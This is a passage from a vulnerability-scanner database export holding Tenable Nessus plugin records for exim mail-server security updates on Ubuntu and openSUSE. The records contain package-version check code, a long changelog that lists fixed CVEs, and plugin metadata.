if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:10", "description": "This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n\n - CVE-2020-28026: Line truncation and injection in spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer 
after BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we reset known-good where we know we need to not be reading BDAT data, as a general case fix, and move the places where we switch to BDAT mode until after various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n\n - Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message (to remove a known security problem if someone does set recipients_max to unlimited, or if local additions add to the recipient list). Fixes CVE-2020-RCPTL reported by Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against cmdline invoker providing a particularly obnoxious sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to match other mail-related applications. Previously an 'H' was used where available info says that 'M' should be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values are commonly used as arguments, so an implementation trying to copy these into a local buffer was taking a taint-enforcement trap. Fix by using dynamically created buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a local. 
Do similar fixes for ACL actions 'dcc', 'log_reject_target', 'malware' and 'spam'; the arguments are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code rearrangement had broken the (no-op) support for this sendmail command. Restore it to doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in constructing their delivery location; this WILL BREAK configurations which are not updated accordingly. In particular: any Transport use of $local_user which has been relying upon check_local_user far away in the Router to make it safe, should be updated to replace $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header name that ends with an asterisk (which is a standards-legal name) will now result in all headers named starting with the string before the asterisk being removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. 
Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module (lookups) open failure, only retrieve the errormessage once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service buffer; this failed because the buffer was in use at the time. Change to a compile-time increase in the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This reduces time for some exim process initialisations. It does mean that the logging of TLS configuration problems is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes, to conform to RFC 8301. They can still be enabled, using the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It seems that the PAM library frees one of the arguments given to it, despite the documentation. Therefore a plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp context. 
Previously on-stack buffers were used, resulting in a taint trap when DSN information copied from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error messages from DMARC verify, when it hit the nonexistent file indicated by the default. Distros wanting DMARC enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities. The introduction of taint tracking also did many adjustments to string handling. Since then, eximon frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT commands sent and check for 452 responses. This slightly helps the inefficieny of doing a large alias-expansion into a recipient-limited target. The max_rcpt transport option still applies (and at the current default, will override the new feature). 
The check is done for either cause of synch, and forces a fast-retry of all 452'd recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being used, so the results became garbage. Make copies while it is still usable.\n\n - Logging: when the deliver_time selector ise set, include the DT= field on delivery deferred (==) and failed (**) lines (if a delivery was attemtped). Previously it was only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN variables in time for the expansion of the server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from untrusted sources.\n\n - Use longer file names for temporary spool files (this avoids name conflicts with spool on a shared file system).\n\n - Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow in string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion which could allow remote attackers to execute other programs with root privileges (boo#1142207)\n\n - spec 
file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n\n - add workaround patch for compile time error on missing printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the 'queue=' ACL modifier. This matches the restriction on the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a single column. Previously only the last row was returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept result of MIME ACL.\n\n - The 'support for' informational output now, which built with Content Scanning support, has a line for the malware scanner interfaces compiled in. Interface can be individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now additionally output by 'exim -d -bV'. 
Previously only the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also erroneously seen as a timeout on read on a GnuTLS initiating connection, resulting in the initiating connection being dropped.\n\n - Relax results from ACL control request to enable cutthrough, in unsupported situations, from error to silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast malware scanner.\n\n - Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read, by skipping non- macro text after a replacement (previously it was only once per line) and by skipping builtin macros when searching for an uppercase lead character.\n\n - DANE support moved from Experimental to mainline. The Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden by ACL, DMARC reported the original. 
Fix to report (as far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n\n - Fix utf8_downconvert propagation through a redirect router.\n\n - Bug 2253: For logging delivery lines under PRDR, append the overall DATA response info to the (existing) per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message acceptance are marked dead before release of memory in the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such as a multi-recipient message from a mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being replaced by the $(authresults ) expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as PID 1. This allows proper process termination in container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP transport. Previously the 'final dot' had a newline after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome values 'err_temp' and 'err_perm', deprecated since 4.83 when the RFC-defined words ' temperror' and 'permerror' were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and nonunderstood responses) in defer=pass mode supply a 450 to the initiator. 
Previously the message would be spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline protocol.\n\n - Fix reinitialisation of DKIM logging variable between messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form, since the IETF WG has not yet settled on that versus the original 'bare' representation.\n\n - Fix syslog logging for syslog_timestamp=no and log_selector +millisec. Previously the millisecond value corrupted the output. Fix also for syslog_pid=no and log_selector +pid, for which the pid corrupted the output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly during configuration. Wildcards are allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing adjacent sets of identical IP addresses on different listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce load on peers. Disable the session-cache too, which might reduce our load. Since we currrectly use a new context for every connection, both as server and client, there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at <https://reproducible-builds.org/specs/source-date-epoch />.\n\n - Fix smtp transport use of limited max_rcpt under mua_wrapper. Previously the check for any unsuccessful recipients did not notice the limit, and erroneously found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels that support MSG_MORE. 
Only in-clear (not on TLS connections).\n\n - Avoid using a temporary file during transport using dkim. Unless a transport-filter is involved we can buffer the headers in memory for creating the signature, and read the spool data file once for the signature and again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It was disabled in 4.77 as the kernel support then wasn't solid, having issues in 64bit mode. Now, it's been long enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface, accept an empty cmdline element to get the documented default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an identity given in dkim_verify_signers, run the dkim acl once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded before use\n\n - Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], 
"modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-677.NASL", "href": "https://www.tenable.com/plugins/nessus/149614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-677.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149614);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2017-1000369\",\n \"CVE-2017-16943\",\n \"CVE-2017-16944\",\n \"CVE-2018-6789\",\n \"CVE-2019-10149\",\n \"CVE-2019-13917\",\n \"CVE-2019-15846\",\n \"CVE-2019-16928\",\n \"CVE-2020-12783\",\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"openSUSE Security Update : exim 
(openSUSE-2021-677) (Stack Clash)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool\n directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in\n parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in\n parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header\n file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for\n privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in\n receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header\n file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in\n extract_option()\n\n - CVE-2020-28026: Line truncation and injection in\n spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after\n BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in\n pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we\n reset known-good where we know we need to not be reading\n BDAT data, as a general case fix, and move the places\n where we switch to BDAT mode until after various\n protocol state checks. 
Fixes CVE-2020-BDATA reported by\n Qualys.\n\n - Fix security issue in SMTP verb option parsing\n (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message\n (to remove a known security problem if someone does set\n recipients_max to unlimited, or if local additions add\n to the recipient list). Fixes CVE-2020-RCPTL reported by\n Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against\n cmdline invoker providing a particularly obnoxious\n sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard\n against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes\n boo#1173693)\n\n - bring in changes from current +fixes (lots of taint\n check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to\n match other mail- related applications. Previously an\n 'H' was used where available info says that 'M' should\n be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values\n are commonly used as arguments, so an implementation\n trying to copy these into a local buffer was taking a\n taint-enforcement trap. Fix by using dynamically created\n buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using\n tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a\n local. Do similar fixes for ACL actions 'dcc',\n 'log_reject_target', 'malware' and 'spam'; the arguments\n are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code\n rearrangement had broken the (no-op) support for this\n sendmail command. Restore it to doing nothing, silently,\n and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in\n constructing their delivery location this WILL BREAK\n configurations which are not updated accordingly. 
In\n particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the\n Router to make it safe, should be updated to replace\n $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header\n name that ends with an asterisk (which is a\n standards-legal name) will now result in all headers\n named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee\n 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. 
Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module\n (lookups) open failure, only retrieve the errormessage\n once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service\n buffer; this failed because the buffer was in use at the\n time. Change to a compile-time increase in the buffer\n size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This\n reduces time for some exim process initialisations. It\n does mean that the logging of TLS configuration problems\n is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless\n disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes,\n to conform to RFC 8301. They can still be enabled, using\n the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a\n transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable\n CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to\n SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It\n seems that the PAM library frees one of the arguments\n given to it, despite the documentation. Therefore a\n plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp\n context. 
Previously on-stack buffers were used,\n resulting in a taint trap when DSN information copied\n from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error\n messages from DMARC verify, when it hit the nonexistent\n file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line\n sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities. The introduction of taint tracking also did\n many adjustments to string handling. Since then, eximon\n frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT\n commands sent and check for 452 responses. This slightly\n helps the inefficieny of doing a large alias-expansion\n into a recipient-limited target. The max_rcpt transport\n option still applies (and at the current default, will\n override the new feature). 
The check is done for either\n cause of synch, and forces a fast-retry of all 452'd\n recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being\n used, so the results became garbage. Make copies while\n it is still usable.\n\n - Logging: when the deliver_time selector ise set, include\n the DT= field on delivery deferred (==) and failed (**)\n lines (if a delivery was attemtped). Previously it was\n only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN\n variables in time for the expansion of the\n server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to\n '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a\n systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to\n 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from\n untrusted sources.\n\n - Use longer file names for temporary spool files (this\n avoids name conflicts with spool on a shared file\n system).\n\n - Use dsn_from main config option (was ignored\n previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow\n in string_vformat, remote code execution seems to be\n possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing\n arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion\n which could allow remote attackers to execute other\n programs with 
root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution\n (boo#1136587)\n\n - add workaround patch for compile time error on missing\n printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the\n 'queue=' ACL modifier. This matches the restriction on\n the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a\n single column. Previously only the last row was\n returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature\n headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done\n from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts\n unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept\n result of MIME ACL.\n\n - The 'support for' informational output now, which built\n with Content Scanning support, has a line for the\n malware scanner interfaces compiled in. 
